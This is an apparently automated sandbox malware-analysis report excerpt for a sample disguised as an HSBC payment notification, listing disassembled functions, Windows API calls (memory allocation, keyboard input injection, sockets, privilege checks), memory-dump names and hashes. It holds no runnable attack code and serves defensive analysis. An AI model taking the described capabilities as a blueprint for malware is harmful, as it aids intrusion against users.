CharLowerBuffW.USER32(?,?), ref: 0047E101

Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
_memmove.LIBCMT ref: 0047E314

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
Opcode Fuzzy Hash: cef8d7c36a1cc281917b3d286024d118431c121cb533efc358e33715f05c58f5
Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86

Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004780C3
CoUninitialize.OLE32 ref: 004780CE

Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4

VariantInit.OLEAUT32(?), ref: 004780D9
VariantClear.OLEAUT32(?), ref: 004783AA

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
Opcode Fuzzy Hash: 75a80dea8493d1a2931086d19cc81c6010b0982a28c841e76fcbb912b52bff69
Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A

Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045688E
SysAllocString.OLEAUT32(00000000), ref: 00456937
VariantCopy.OLEAUT32 ref: 00456966
VariantClear.OLEAUT32(?), ref: 0045698D

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
Opcode Fuzzy Hash: 48c7ad8db9939df1b91deb5faf574402407bc3b3f46c3c8fc36f7f8110f9ebc7
Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D

Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
WSAGetLastError.WSOCK32(00000000), ref: 004769E1

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
WSAGetLastError.WSOCK32(00000000), ref: 00476A51

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59

Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
_strlen.LIBCMT ref: 004764D9

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
Opcode Fuzzy Hash: 06a60a28df12286d3fae1664d3672c1810fd433a8f21eb32722a08b1b953fb3e
Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58

Function 009D2A8F Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 009D2ADC
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009D2B65
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009D2B77
__freea.LIBCMT ref: 009D2B80

Part of subcall function 009D288A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 009D28BC

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: bf905303615c788700d49ebced79ab3e5f8ebe7e4d43251188e6e9648d35964f
Instruction ID: 21af1068df34734d9201a0408063a3a9610a95f053a8c15f03becf3f920cae64
Opcode Fuzzy Hash: bf905303615c788700d49ebced79ab3e5f8ebe7e4d43251188e6e9648d35964f
Instruction Fuzzy Hash: 7831C332A5020AABDF259F64DC85EAE7BA9EF61350B04816BFC04D7250E779CD50DB90

Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F

Function 0048AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0048AB60
GetWindowRect.USER32(?,?), ref: 0048ABD6
PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
MessageBeep.USER32(00000000), ref: 0048AC57

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A

Function 00460AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F

Function 00460C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00460C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00460D33

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B

Function 004361C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
__isleadbyte_l.LIBCMT ref: 00436229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754

Function 00484EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00484F02

Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669

GetCaretPos.USER32(?), ref: 00484F13
ClientToScreen.USER32(00000000,?), ref: 00484F4E
GetForegroundWindow.USER32 ref: 00484F54

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5

Function 0048C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetCursorPos.USER32(?), ref: 0048C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
GetCursorPos.USER32(?), ref: 0048C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8

Function 00458656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
_memcmp.LIBCMT ref: 004586C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
HeapFree.KERNEL32(00000000), ref: 00458703

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58

Function 0042098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 004209AE

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

_fprintf.LIBCMT ref: 004209E5
OutputDebugStringW.KERNEL32(?), ref: 00455DBB

Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3

__setmode.LIBCMT ref: 00420A1A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D

Function 00476369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

gethostbyname.WSOCK32(?,?,?), ref: 00476399
WSAGetLastError.WSOCK32(00000000), ref: 004763A4
_memmove.LIBCMT ref: 004763D1
inet_ntoa.WSOCK32(?), ref: 004763DC

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

